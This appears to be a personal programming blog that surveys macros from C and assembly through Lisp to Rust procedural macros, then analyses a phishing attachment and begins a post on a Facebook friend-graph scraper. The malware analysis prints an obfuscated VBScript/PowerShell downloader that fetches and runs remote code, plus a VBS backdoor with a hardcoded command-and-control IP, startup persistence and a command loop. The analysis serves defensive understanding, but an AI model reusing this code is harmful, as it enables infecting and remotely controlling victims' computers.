How I Learned to Stop Worrying and Love Macros

Rust macros are powerful, that's a fact. I mean, they allow running any code at compile-time, of course they're powerful.

C macros, which are at the end of the day nothing more than glorified text substitution rules, allow you to implement new, innovative, modern language constructs, such as:

#define ever (;;)
for ever { 
   ...
}
https://stackoverflow.com/a/652802/2196124

or even:

#include <iostream>
#define System S s;s
#define public
#define static
#define void int
#define main(x) main()
struct F{void println(char* s){std::cout << s << std::endl;}};
struct S{F out;};

public static void main(String[] args) {
  System.out.println("Hello World!");
}
https://stackoverflow.com/a/653028/2196124

But these are just silly examples written for fun. Nobody would ever commit such macro abuse in real-world, production code. Nobody...

/*	mac.h	4.3	87/10/26	*/

/*
 *	UNIX shell
 *
 *	S. R. Bourne
 *	Bell Telephone Laboratories
 *
 */
 
...

#define IF	if(
#define THEN	){
#define ELSE	} else {
#define ELIF	} else if (
#define FI	;}

#define BEGIN	{
#define END	}
#define SWITCH	switch(
#define IN	){
#define ENDSW	}
#define FOR	for(
#define WHILE	while(
#define DO	){
#define OD	;}
#define REP	do{
#define PER	}while(
#undef DONE
#define DONE	);
#define LOOP	for(;;){
#define POOL	}

...

ADDRESS alloc(nbytes)
    POS     nbytes;
{
    REG POS rbytes = round(nbytes+BYTESPERWORD,BYTESPERWORD);

    LOOP    INT     c=0;
    REG BLKPTR  p = blokp;
    REG BLKPTR  q;
    REP IF !busy(p)
        THEN    WHILE !busy(q = p->word) DO p->word = q->word OD
        IF ADR(q)-ADR(p) >= rbytes
        THEN    blokp = BLK(ADR(p)+rbytes);
            IF q > blokp
            THEN    blokp->word = p->word;
            FI
            p->word=BLK(Rcheat(blokp)|BUSY);
            return(ADR(p+1));
        FI
        FI
        q = p; p = BLK(Rcheat(p->word)&~BUSY);
    PER p>q ORF (c++)==0 DONE
    addblok(rbytes);
    POOL
}
I'm sorry.

This bit of code is taken directly from the original Bourne shell code, from a BSD Tahoe 4.3 source code archive. Steve Bourne was an Algol 68 fan, so he tried to make C look more like it.

But Rust macros ain't like that.

What are Rust macros?

That's a good question. I've got a better one for you:

What are macros?

Macros, at the simplest level, are just things that do other things quicker (for the user) than by manually doing said things.

This definition encompasses quite a lot of features you've probably already encountered. Of course, if you're a developer, hearing "macro" often triggers a fight-or-flight response, deeply rooted in a bad experience with C preprocessor macros. If you're a Microsoft Office power user, "macros" are probably the first thing you're taught to be afraid of (second only to "moving a picture in a Word document"), thanks in part to the large number of malware that used VBA macros to propagate in the early 2000s. This definition even includes the simple, "key-sequence" macros that a lot of programs allowed you to record and bind to keys.

I use the past tense here, because this trend wore off quite long ago, around the same time we stopped seeing MDI interfaces.

These have pretty much disappeared, replaced by tabs and docking UIs

Back on topic. This is about programming, so the macros we're talking about are the ones we find in programming languages. Even though the C ones are the most famous (because there's no other language where there are so few built-in constructs that you have to write macros at one point or another), they weren't the first ones.

A Brief History of Macros

In the early 1950s, if you wanted to write a program for your company's mainframe computer, your choices were more limited than today, language-wise. "Portable" languages (Fortran, COBOL, eventually Algol) were a new concept, so basically everything serious was written in whatever machine language your computer understood. Of course, you didn't write the machine language directly, you used what was and is still called an assembler to translate some kind of textual representation into the raw numeric code data you'd then pass on to the mainframe using punch cards or whatnot.

After some time, assemblers started providing ways to declare "shortcuts" for other bits of code. I'll make a bit of an anachronism here by writing x86 assembly targeting Linux. Let's say you want to make a simple "Hello World" program:

section .text						; text segment (code)
	mov eax, 4 						; syscall (4 = write)
	mov ebx, 1 						; file number (1 = stdout)
	mov ecx, message				; string to write
	mov edx, length					; length of string
	int 80h							; call kernel

section .data
	message db 'Hello World', 0xA	; d(efine) b(yte) for the string, with newline
    length equ $ - message			; length is (current position) - (start)

Don't worry if you don't fully understand the code above, it's not the point. Here, writing a string takes 5 whole lines (filling up the 4 parameters and then calling the kernel). Compare this to Python:

print("Hello World")

If only there were a way to tell the assembler that those five lines are really one single operation, that we may want to do often...

%macro print 2		; define macro "print" with 2 parameters
	mov eax, 4
	mov ebx, 1
	mov ecx, %1		; message is first parameter
	mov edx, %2		; length is second parameter
	int 80h	
%endmacro

section .text
	print message1, length1
	print message2, length2
    
section .data
	message1 db 'Hello World', 0xA
	length1 equ $ - message1
    
	message2 db 'Simple macros', 0xA
	length2 equ $ - message2

Here, the "macro" is just performing simple text substitution. When you write print foo, bar, the assembler replaces the line with everything between %macro and %endmacro, all while also replacing every occurrence of %N with the value of the corresponding parameter. This is the most common kind of macro, and is pretty much what you get in C:

#define PRINT(message, length) write(STDOUT_FILENO, message, length)
Don't do this in C.

Too good to be true

Obviously, it has limitations. What if, in assembly, you did this:

mov eax, 42		; just storing something in eax
print foo, bar	; just printing my message
mov ebx, eax	; where's my 42 at?

Unbeknownst to you, the print macro modified the value of the eax register, so the value you wrote isn't there anymore!

What if, in C, you did this:

#define SWAP(a, b) int tmp = a;	\
                   a = b;		\
                   b = tmp;

int main() {
	int tmp = 123;
    // ...
	int x = 5, y = 6;
    SWAP(x, y); // ERROR: a variable named 'tmp' already exists
}

Here, there's a conflict between the lexical scope of the function (main) and the macro (SWAP). Short of using names like __macro_variable_dont_touch_tmp in your macros, there's not much you can do to entirely prevent problems like this. What about this:

int main() {
	int x = 5, y = 6, z = 7;
    int test = 100;

	if (test > 50)
    	SWAP(x, y);
    else
    	SWAP(y, z);
}

The above code does not compile. It walks like correct code and quacks like correct code, but here's what it looks like after macro-expansion:

int main() {
	int x = 5, y = 6, z = 7;
    int test = 100;

	if (test > 50)
    	int tmp = x;
        x = y;
        y = tmp;
    else
    	int tmp = y;
        y = z;
        z = tmp;
}

Braceless ifs must contain exactly one statement, but here there are 3 of them! Let's fix it:

#define SWAP(a, b) {int tmp = a;	\
                   a = b;			\
                   b = tmp;}

Now, it should work, shouldn't it? Nope, still broken!

if (test > 50)
   	{int tmp = x;
    x = y;
    y = tmp;};
else
   	{int tmp = y;
    y = z;
    z = tmp;};

Not seeing it? Let me reformat it for you:

if (test > 50) {
   	int tmp = x;
   	x = y;
  	y = tmp;
}
;
else
   	...

Since we're writing SWAP(x, y); there's a semicolon hanging right there, after the code block, so the else is not connected to the if anymore. The solution, obviously, is to do:

#define SWAP(a, b) do{int tmp = a;		\
                   a = b;				\
                   b = tmp;}while(0)

Here, the expanded code is equivalent to the one we had before, but requires a semicolon afterwards, so the compiler is happy.

Another simple example is

#define MUL(expr1, expr2) expr1 * expr2

int res = MUL(2 + 3, 4 + 5);

This gets expanded to

int res = 2 + 3 * 4 + 5; // bang!

Macros have no knowledge of concepts such as "expressions" or "operator precedence", so you have to resort to tricks like adding parentheses everywhere:

#define MUL(expr1, expr2) ((expr1) * (expr2))
But... it's broken? There's no reason anyone should have to do this sort of syntax wizardry just to get a multiline macro or a macro processing expressions to work!

A few years ago, in the 1960s to be precise, some smart guys in a lab realized that "just replace bits of text by other bits of text" was not, bear with me, the best way to do macros. What if, instead of performing modifications on the textual form of the code, the macros could work on an abstract representation of the code, and likewise produce an output in a similar way.

SaaS (Software as an S-expression)

This is a Lisp program (and its output):

> (print (+ 1 2))
3

Lisp (for LISt Processing) has a funny syntax. In Lisp, things are either atoms or lists. An atom, as its name implies, is something "not made of other things". Examples include numbers, strings, booleans and symbols. A list, well, it's a list of things. A list being itself a thing, you can nest lists. This is a list containing various things (don't try to run it, it's not a full program):

(one ("thing" or) 2 "inside" a list)

You may notice that this looks awfully like the program I wrote earlier; it's not luck: one of Lisp's basic tenets is that programs are just data. A function call, that most languages would write f(x, y) can simply be encoded as a list: (f x y).

The technical term for a "thing" (something that is either an atom or a list, with lists written with parentheses and stuff) is s-expression.

When you give Lisp an expression, it tries to evaluate it. An atom evaluates to itself. A list is evaluated by looking at its first element, which must be a function, and calling it with the rest of the list as its parameters. You can tell Lisp to not evaluate something, using a function called quote.

> (+ 4 5)
9
> (quote (+ 4 5))
(+ 4 5)

In the end, you get code like this:

> (print (length (quote (a b c d))))
4

(print... and (length... are evaluated, but (a... is kept as it, because it's really a list, not a bit of code.

The opposite of quote is called eval:

> (quote (+ 4 5))
(+ 4 5)
> (eval (quote (+ 4 5))
9

Through this simple mechanic, Lisp allows you to modify programs dynamically as if they were any other data you can manipulate – because they really are any other data you can manipulate.

Let's rewrite our MUL macro from before. I'll define a function which takes two parameters, and returns code that multiply them.

> (define (mul expr1 expr2)
  	(list (quote *) expr1 expr2)) ; * is quoted so it appears verbatim in the output
> (mul (+ 2 3) (+ 4 5))
  	(* 5 9)

That's not exactly what I want, since I don't want the operands to be evaluated right at the beginning, so I'll quote them:

> (mul (quote (+ 2 3)) (quote (+ 4 5)))
  	(* (+ 2 3) (+ 4 5))
> (eval (mul (quote (+ 2 3)) (quote (+ 4 5))))
  	45

You'll notice right away that we don't have any operator precedence problem like we had in C. But we do have problems: we have to put (quote ...) around every operand to prevent it from being evaluated, and we have to (eval ...) the result to really run the code that was produced. Since these steps are quite common, they were abstracted away in a a language builtin called define-macro:

> (define-macro (mul expr1 expr2)
  	(list (quote *) expr1 expr2))
> (mul (+ 2 3) (+ 4 5))
  	45

Here's what the SWAP macro would look like:

(define-macro (swap var1 var2)
  	(quasiquote 
    	(let ((tmp (unquote var1)))
    		(set! (unquote var1) (unquote var2))
        	(set! (unquote var2) tmp)))

I'm using functions I haven't talked about yet. quasiquote does the same thing as quote, that is, return its argument without evaluating it, except that if you write (unquote ...) somewhere in it, the argument of unquote is inserted evaluated. You don't have to understand this, only that all of these tools are, in the end, nothing more than syntactic sugar for manipulating lists.

set! is just what you use to change a variable's value.

That's cheating, Lisp isn't a real language anyway

I mean, obviously. Real languages have syntaxes way more complex than lists of things. When you look at a real program written in a real language, for example C, you don't see a list. You see blocks, declarations, statements, expressions.

int factorial(int x) // function signature
{ // code block
	if (x == 0) // conditional statement
    {
    	return 1; // return statement
    } 
    else 
    {
    	return x * factorial(x - 1); // expression, function call
    }
}

Well...

(define (factorial x)
	(if (zero? x)
    	1
        (* x (factorial (- x 1)))))

Or, linearly:

(define (factorial x) (if (zero? x) 1 (* x (factorial (- x 1)))))
That's a list if I've ever seen one

When a compiler or interpreter reads a program, it does something called parsing. It reads a sequence of characters (letters, digits, punctuation, ...) and converts it (this is the non-trivial part) into something it can process more easily.

Think about it, when you read the block of C code above, you don't read a sequence of letters and symbols. You see that it's a function declaration, with a return type, a name, a list of parameters and a body. Each parameter has a name and a type, and the body is a code block containing an if-statement, itself containing more code.

A data structure that stores things that are either atomic or made of other things is called a tree. Lisp lists (try saying that out loud quickly) can contain atoms or other lists, they're just one way of encoding trees.

Here, we're using a tree to store a program's source code, which is text, but we know that the code respects a set of rules, called the syntax. Oh, and we abstract away non-essential details like whitespace, parentheses and whatnot.

We might as well call that an Abstract Syntax Tree! (a.k.a. AST)

G fdecl Function declaration 'factorial' id1 Type 'int' fdecl->id1 Return type plist Parameter list fdecl->plist Parameters body 'If' statement fdecl->body Body p1 Parameter 'x' plist->p1 id4 Type 'int' p1->id4 Type cond Binary operation '==' body->cond Condition body_true [code if true] body->body_true If true body_false [code if false] body->body_false If false cop1 Variable 'x' cond->cop1 Operand 1 cop2 Constant 0 cond->cop2 Operand 2

I've omitted some details from the diagram above for the sake of brevity, but you get the idea. Code (text) becomes code (tree), and code (tree) matches more closely the mental idea we have of what code (text) means.

We reach the same conclusion we had we Lisp: code is data. The only difference is that in Lisp, you can really take code and turn it into data, it's "built-in", whereas there's nothing in C for that. The main reason is that code is a weird kind of data. Numbers are simple; arrays, a bit more convoluted but still simple; code is hard to reason about. Trees and stuff. Lisp is built around dynamic lists, so it's easy. C is built around human suffering, it's definitely not made for manipulating code. I mean, imagine writing a parser, or even a compiler in C.

Being able to manipulate code from code is called metaprogramming, and few languages have it built-in. Lisp does it, because it's Lisp. C# does it too, albeit only for a (large enough) subset of the language, with what they call "expression trees":

void Swap<T>(Expression<Func<T>> a, Expression<Func<T>> b)
{
	var tmp = Expression.Parameter(typeof(T));
	var code = Expression.Lambda(
		Expression.Block(new [] { tmp }, 		// T tmp;
			Expression.Assign(tmp, a.Body),		// tmp = [a];
			Expression.Assign(a.Body, b.Body),	// [a] = [b];
			Expression.Assign(b.Body, tmp)));	// [b] = tmp;
	var compiled = (Func<T>) code.Compile();
	compiled();
}

class Foo
{
	public int A;
	public int B;
}

var obj = new Foo { A = 123, B = 456 };
Swap(() => obj.A, () => obj.B);

It's a bit more complicated than in Lisp, because here, the way to achieve what we did with quote (i.e., pass an unevaluated expression to a function) involves declaring a parameter with the Expression<T> type, with T being a function type. This means that you can't pass any expression directly, you must pass a function returning that expression (hence the () =>).

We don't have eval either, instead we can compile an expression we built into a real function we can then call (and it's that call that does what eval would do in Lisp in that context).

Building code is also more complicated: since C# code is not made of lists, you can't just create a sequence of things and call it a day, code here is stored as objects ("expression trees") that you build using functions such as Expression.Assign or Expression.Block.

All of this also means that only a subset of the language is available through this feature – you can't have classes in functions for examples. At the end of the day, it's not really a problem, most problems solved by macros are solved through other means in C#, and this metaprogramming-like expression tree wizardry is almost only ever used in contexts where only simple expressions will be used.

Long Recaps Considered Harmful

3,000! If you're still there, you've just read 3,000 words of me rambling about old languages and weird compiler theory terminology. This post was supposed to be about Rust macro abuse.

Rust has macros. Twice.

Rust supports two kinds of macros: declarative macros and procedural macros.

Declarative macros are a bit like C macros, in that they can be quite easy to write, although in Rust they are much less error-prone. See for yourself:

macro_rules! swap {
    ($a:expr, $b:expr) => { 
        let tmp = $a;
        $a = $b;
        $b = tmp;
    };
}

fn main() {
    let (mut a, mut b) = (123, 456);
    swap!(a, b);
    println!("a={} b={}", a, b);
}
macro_rules! mul {
	($a:expr, $b:expr) => {
    	$a * $b
    };
}

fn main() {
	println!("{}", mul!(2 + 3, 4 + 5)); // no operator precedence issue
}

Declarative macros can operate on various parts of a Rust program, such as expressions, statements, blocks, or even specific token types, such as identifiers or literals. They can also operate on a raw token trees, which allow for interesting code manipulation techniques. But even though they work in a cleaner way and support advanced patterns, with repetitions and optional parameters, they're just a more advanced form of substitution. So, closer to C macros.

Procedural macros, on the other hand, are more like Lisp macros. They're written in Rust, get passed a token stream (a list of tokens from the source code) and are expected to give one back to the compiler. Apart from that, they can do basically anything.

They look like this:

#[proc_macro]
pub fn macro_name(input: TokenStream) -> TokenStream {
    todo!()
}

They're often used for code generation, for example for generating methods from a struct definition, for example:

#[derive(Debug)]
struct Person {
	name: String,
    age: u8
}

This generates an implementation of the Debug trait for the Person type, which will contain code allowing to get a pretty-printed, human-readable version of any Person object when needed. derive(PartialEq) and derive(PartialOrd) generate equality and ordering methods, etc.

But there are less... orthodox uses for procedural macros.

Mara Bos famously wrote some interesting crates – the first one, inline_python, allows running Python code from Rust seamlessly, with bidirectional interaction (for variables):

use inline_python::python;

fn main() {
    let who = "world";
    let n = 5;
    python! {
        for i in range('n):
            print(i, "Hello", 'who)
        print("Goodbye")
    }
}

I highly recommend reading her blogpost series on the subject where she goes deep in detail on how to implement such a macro. It involves lot of subtle tricks needed to deal with how the Rust compiler reads and tokenizes code, how errors can be mapped from Python to Rust, etc.

She also wrote whichever_compiles, which runs multiple instances of the compiler to find... whichever bit of code compiles, among a list you provide:

use whichever_compiles::whichever_compiles;

fn main() {
    whichever_compiles! {
        try { thisfunctiondoesntexist(); }
        try { invalid syntax 1 2 3 }
        try { println!("missing arg: {}"); }
        try { println!("hello {}", world()); }
        try { 1 + 2 }
    }
}

whichever_compiles! {
    try { }
    try { fn world() {} }
    try { fn world() -> &'static str { "world" } }
}

The macros forks the compiler process, at compile-time, and each child process tries one of the branches. The first one to compile wins, and the winning branch is used for the rest of the build process.

After a series of unfortunate events, I was informed of the existence of procedural macros, and decided that I had to make one. After some nights of work, I brought to the world embed-c, the first procedural macro to allow anyone to write pure, unadulterated C code in the middle of a Rust code file. Complete with full interoperability with the Rust code, obviously. This has made a lot of people very angry and been widely regarded as a bad move.

use embed_c::embed_c;

embed_c! {
    int add(int x, int y) {
        return x + y;
    }
}

fn main() {
    let x = unsafe { add(1, 2) };
    println!("{}", x);
}

It uses a library called C2Rust which, really, is what it sounds like. It's a toolset that relies on Clang to parse and analyze C code, and generates equivalent (in behavior) Rust code. Obviously, the generated code is not idiomatic, and quickly becomes unreadable if you use enterprise-grade C control flow features such as goto. But can Rust really replace C in the industry without a proper implementation of Duff's device?

embed_c! {
    void send(to, from, count)
        register short *to, *from;
        register count;
    {
        register n = (count + 7) / 8;
        switch (count % 8) {
        case 0: do { *to++ = *from++;
        case 7:      *to++ = *from++;
        case 6:      *to++ = *from++;
        case 5:      *to++ = *from++;
        case 4:      *to++ = *from++;
        case 3:      *to++ = *from++;
        case 2:      *to++ = *from++;
        case 1:      *to++ = *from++;
                } while (--n > 0);
        }
    }
}

fn main() {
    let mut source = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10];
    let mut dest = [0; 10];
    unsafe { send(dest.as_mut_ptr(), source.as_mut_ptr(), 10); };
    assert_eq!(source, dest);
}

After seeing Mara's inline_python crate, I was taken aback by her choice of such an outdated language – Python was created in 1991!

VBScript, first released in 1996, is a much more modern language than Python. It provides transparent COM interoperability, is supported out-of-the-box on every desktop version of Windows since 98 – even Windows CE on ARM is supported; and it has been since 2000, whereas Python won't run on Windows ARM until 3.11 (2022).

As such, I had no other choice but to create inline_vbs, for all your daily VBS needs.

use inline_vbs::*;

fn main() {
    vbs![On Error Resume Next]; // tired of handling errors?
    vbs![MsgBox "Hello, world!"];
    if let Ok(Variant::String(str)) = vbs_!["VBScript" & " Rocks!"] {
        println!("{}", str);
    }
}

It relies on the Active Scripting APIs, that were originally designed to allow vendors to add scripting support to their software, and it's actually a nice idea. You can have multiple languages providers, and a program relying on the AS APIs would automatically support all installed languages. The most common were JScript and VBScript, because they were installed by default on Windows, but you could add support for Perl, REXX or even Haskell. Haskell! Think about it. This means that on a computer with the Haskell provider installed, this bit of code would be valid and would kinda work in Internet Explorer:

<HTML>
    <HEAD>
        <TITLE>Active Scripting demo</TITLE>
    </HEAD>
    <BODY>
        <H1>Welcome!</H1>
        <SCRIPT LANGUAGE="HASKELL">
            main :: IO ()
            main = putStrLn "Hello World"
        </SCRIPT>
    </BODY>
</HTML>

One major pain point is that VBScript, like Python, is a dynamic language, where values can change type, something that statically-typed languages like Rust are proud to say they do not like at all, thank you very much.

Since VBScript is handled through COM APIs, values are transferred using the VARIANT COM type, which is pretty much a giant union of every COM type under the sun. Luckily, this matches up perfectly with Rust's discriminated unions – I take it as a sign from the universe that Rust and VBScript were made to work together.

That's pretty much it for today.

Quick analysis of a virus

I just received a spam e-mail impersonating the French social security ("Assurance Maladie"), which tells me to download my tax statement which they have graciously attached.

There are multiple things to notice here:

  • the sender address: [email protected]
  • onmicrosoft.com is used by Office 365 addresses, so they probably used Azure or something like that
  • the whole message is a picture, probably a screenshot of a real e-mail. Well, at least that way they don't write a fake message in broken Google-Translated French

Now, the attachments.

No PDF file, that's unusual, it's quite common for this kind of spam, but rejoice! we have a VBScript file right there.

(the CSV file and the .bin file don't contain anything interesting, or at least I didn't find anything interesting in them)

Here is the VBS file, raw as I received it:

on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:JPHgjNP = replace("WiDDXetmcript.iDDXetmhEll","iDDXetm","s"):Set cfAKtQG = CreateObject(JPHgjNP ):izZHSpc = Replace("POWlZsTwIURSHlZsTwIULL","lZsTwIU","E"):WScript.Sleep 2000:WScript.Sleep 2000:cfAKtQGcfAKtQGNXPDFLW = "  $00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X":cfAKtQG.Run(izZHSpc+cfAKtQGcfAKtQGNXPDFLW+""),0,True:Set cfAKtQG = Nothing

Quite unreadable, if you ask me. Here is it after replacing all the : by line breaks, after evaluating the replace( calls and merging all the strings together:

on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
WScript.Sleep 2000
WScript.Sleep 2000
CreateObject("Wscript.shEll").Run("POWERSHELL  $00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X"),0,True

Sleeps 4 seconds and runs PowerShell with some weird code. Let's have a look at the PowerShell code:

$00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X

Let's remove all those <##>s and merge all those strings:

[System.Threading.Thread]::Sleep(2300);
[System.Threading.Thread]::Sleep(2300);
[System.Threading.Thread]::Sleep(2300);
$8ZRVUBH=I`E`X ('(New-Object Net.WebClient).DownloadString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')' -Join '')|I`E`X

Much more readable! So this is just sleeping about 7 seconds and then... it downloads a text file... and runs it? Let's have a look at the link.

upv.es is the official website of the Universitat Politècnica de València (Technical University of Valencia). webs.upv.es is the subdomain corresponding to the Web hosting service provided by the university. cursosinf.webs.upv.es corresponds, I can only guess, to the IT department of the school.

The website is empty at the time I'm writing:

But the file itself is still online, and looks like this:

try
{
$OutPath = "C:\ProgramData\Links"
if (-not (Test-Path $OutPath))
        {
            New-Item $OutPath -ItemType Directory -Force
        }

(New-Object Net.WebClient).DownloadFile('https://cursosinf.webs.upv.es/wp-includes//js/jcrop/1.txt', 'C:\ProgramData\Links\1.bat')
Start-Sleep 3
start C:\ProgramData\Links/1.bat

Start-Sleep 10

$Content = @'
<binary content>

This downloads a batch file which we'll analyse later.

Right now, it's creating an(other) VBS file (comments are mine):

On error resume next

Public IP, Port, SPL, A, StartupCheck

Set WshNetwork = CreateObject("Wscript.Network")
Set MyObject = CreateObject("Wscript.Shell")

' C&C (Command and Control server)
IP = "185.81.157.26"
Port = "5734"
StartupCheck = "True"
SPL = "|" & "V" & "|"

' Sends an AJAX request
Function POST(ByVal DA, ByVal Param)
	On error resume next
	Dim MSXML, PO, HTTP, UserAgent
	MSXML = "Microsoft.XMLHTTP"
	PO = "POST"
	HTTP = "http://"
	UserAgent = "User-Agent:"
	
	Dim ResponseText
	Set ObjHTTP = CreateObject(MSXML)
	ObjHTTP.Open PO, HTTP & IP & ":" & Port & "/" & DA, False
	ObjHTTP.SetRequestHeader UserAgent, INF
	ObjHTTP.Send Param
	ResponseText = ObjHTTP.ResponseText
	POST = ResponseText
End Function

' Installs the current script in the Startup folder, so that it gets executed at each boot
Sub Installation()
If StartupCheck = "True" Then
	Set FSO = CreateObject("Scripting.FileSystemObject")
	FSO.CopyFile Wscript.ScriptFullName, MyObject.SpecialFolders("Startup") & "\Install32.vbs"
End If
End Sub

Call Installation

Function RandomString()
    Dim str, min, max
    Const LETTERS = "ABCDEFGHIJKLMOPQRSTVWXYZ0123456789"
    min = 1
    max = 15
    Randomize
    For i = 1 to 15
        str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
    Next
    RandomString = str
End Function

' Fetches the version info using WMIC to know what Windows version the computer is running
Function HWID
	Dim objWMIService, colItems, result
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set colItems = objWMIService.ExecQuery("SELECT Version FROM Win32_ComputerSystemProduct")
	For Each objItem in colItems
		result = result & objItem.IdentifyingNumber
	Next
	HWID = result
End Function

' Generates a string with the format 
' \PCNAME\Account\Microsoft Windows 10 Professionnel\Windows Defender\Yes\Yes\FALSE\
Function INF
	Dim VR, AV, OS, PC, USER, ID
	VR = "v0.2"
	AV = "Windows Defender"
	PC = WshNetwork.ComputerName
	USER = WshNetwork.UserName
	ID = HWID
		
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem",,48)
	For Each objItem in colItems
		OS = OS + objItem.Caption
	Next
	INF = ID & "\" & PC & "\" & USER & "\" & OS & "\" & AV & "\" & "Yes" & "\" & "Yes" & "\" & "FALSE" & "\"
End Function

' Creates a file, fills it with the specified content
' If the extension is PS1, run it with PowerShell
' Otherwise, run it directly
Sub CreateEmptyFile(ByVal Content, ByVal Filename)
	Set FSO = CreateObject("Scripting.FileSystemObject")
	Set FileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(FSO.GetSpecialFolder(2) & "\" & Filename, 2, True)
	FileToWrite.WriteLine(Content)
	FileToWrite.Close
	Set FileToWrite = Nothing
	WScript.Sleep 2000
	If InStr(Filename, ".PS1") = 0 Then
		MyObject.RuN FSO.GetSpecialFolder(2) & "\" & Filename
	Else
		MyObject.ruN "POWERSHELL -EXECUTIONPOLICY REMOTESIGNED -FILE " + FSO.GetSpecialFolder(2) & "\" & Filename, 0
	End If
End Sub

' The interesting part!
' The main control loop
' This fetches, every 3 seconds, a "command" from the C&C server
' This is how the server "tells" the infected computer what to do
Do While True
	A = Split(POST("Vre", ""), SPL)
	Select Case A(0)
    	' creates and run a file with content and filename
		Case "RF"
			CreateEmptyFile A(1), A(2)
        ' creates and run a PowerShell file with content and random filename
		Case "TR"
			CreateEmptyFile A(1), RandomString & ".PS1"
        ' stops the control script
		Case "Cl"
			Wscript.Quit
        ' creates and run a VBscript file with content and random filename
		Case "exc"
			CreateEmptyFile A(1), RandomString & ".vbs"
        ' same as RF, no idea why they made two of them
		Case "Sc"
			CreateEmptyFile A(1), A(2)
        ' same as Cl
		Case "Un"
			Wscript.Quit
	End Select
	WScript.Sleep 3000
Loop

The VBS file is then saved and launched:

'@
Set-Content -Path C:\ProgramData\Links\install.vbs -Value $Content

Start-Sleep 3
start C:\ProgramData\Links\install.vbs

} catch { }

It's quite interesting how "simple" the virus is, really. At the bottom of it, it's just a loop that infinitely POSTs to a server and does something depending on the response.

Six handshakes away

Have you ever heard about "six degrees of separation"? It's about the famous idea that there are always less than about six persons between two individuals chosen at random in a population. Given enough people, you'll always find someone whose uncle's colleague has a friend that knows your nextdoor neighbour.

Fun fact: it's where the name of the long-forgotten social network sixdegrees.com came from.

Mathematically, it checks out. If you have 10 friends and each of those friends has 10 friends, in theory that's a total of 1+10+9*10=101 individuals. In practice, when you have 10 friends, they probably know each other as well, and their friends most probably do too. You end up with way fewer than 101 people, and no two persons in your "social graph" ever end up more than one or two handshakes away from each other.

In graph theory, those kinds of graphs where you have densely connected communities, linked together by "hubs", i.e. high-degree nodes, are called "small-world networks".

Oh you know Bob? Isn't it a small world!

I learned about it a few weeks ago in a very nice (French) video on the subject, and immediately thought "I wonder what the graph of everyone I know looks like". Obviously, I can't exhaustively list every single person I've met in my life and put them on a graph.

Or can I?


One of the few good things™ Facebook gave us is a really fast access to petabytes of data about people we know, and especially our relationships with them. I can open up my childhood best friend's profile page and see everyone he's "friends" with, and click on a random person and see who they're friends with, et cætera. So I started looking for the documentation for Facebook's public API which, obviously, exists and allows for looking up this kind of information. I quickly learned that the exact API I was looking for didn't exist anymore, and all of the "alternative" options (Web scrapers) I found were either partially or completely broken.

So I opened up PyCharm and started working on my own scraper, that would simply open up Facebook in a Chromium Webdriver instance, and fetch data using ugly XPath queries.

def query(tab):
    return "//span[text() = '" + tab + "']/ancestor::div[contains(@style, 'border-radius: max(0px, min(8px, ((100vw')]/div[1]/div[3]/div"
Truly horrible.

After 180 lines and some testing, I had something that worked.

Basically, the script loads a Facebook account's friends list page and scrolls to the bottom, waiting for the list to dynamically load until the end, and then fetches all the links in a specific <div> which each conveniently contain the ID of the friend. It then adds all of those IDs to the stored graph, and iterates through them and repeats the whole process. It's a BFS (breadth-first-search) over webpages.

